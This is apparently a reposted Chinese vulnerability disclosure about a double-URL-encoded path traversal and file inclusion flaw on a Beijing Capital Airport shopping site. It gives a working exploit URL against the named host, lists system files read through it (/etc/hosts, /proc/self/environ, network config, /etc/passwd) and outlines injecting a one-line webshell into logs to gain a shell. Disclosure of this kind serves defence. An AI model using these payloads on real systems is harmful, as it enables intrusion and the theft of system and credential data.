首都机场某站程序存在URI编码任意文件包含漏洞

2次URL便秘


http://shopping.bcia.com.cn/app/eshop/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fissue%2500.jpg/single/id/133

首都机场某站程序存在URI编码任意文件包含漏洞_第1张图片







思路是这样的,



向日志文件注入一句话木马,然后包含日志文件可拿shell



然而并没有那么幸运的猜到路劲...

漏洞证明:

../../../../../../etc/hosts

首都机场某站程序存在URI编码任意文件包含漏洞_第2张图片



../../../../../../proc/self/environ

首都机场某站程序存在URI编码任意文件包含漏洞_第3张图片



../../../../../../etc/sysconfig/network-scripts/ifcfg-eth0

首都机场某站程序存在URI编码任意文件包含漏洞_第4张图片



昨晚试了一下/etc/passwd还能读取,今天就不行了.

管理GG你是半夜还看了日志么..

然后你就只限制了读取passwd的权限?

修复方案:

你们更专业


你可能感兴趣的:(首都机场某站程序存在URI编码任意文件包含漏洞)